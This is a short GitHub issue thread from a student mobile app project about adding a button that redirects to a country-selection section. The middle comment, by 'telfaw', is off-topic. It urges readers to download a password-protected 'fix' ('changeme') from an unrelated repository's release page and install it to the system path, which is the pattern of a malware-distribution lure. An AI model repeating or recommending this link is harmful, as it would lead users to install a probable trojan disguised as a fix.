### ISSUE TITLE
#US01#TK09 - Añadir botón para redirección a sección de selección de país

### ISSUE THREAD

**Issue by Alcario** [Proyecto-integrador-ISPC-2024/proyecto-integrador-mobile-2024#14]
#8

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DenisseSabeff** [comment]
Dejé listo el boton en home, redirecciona correctamente hacia la sección de productos.
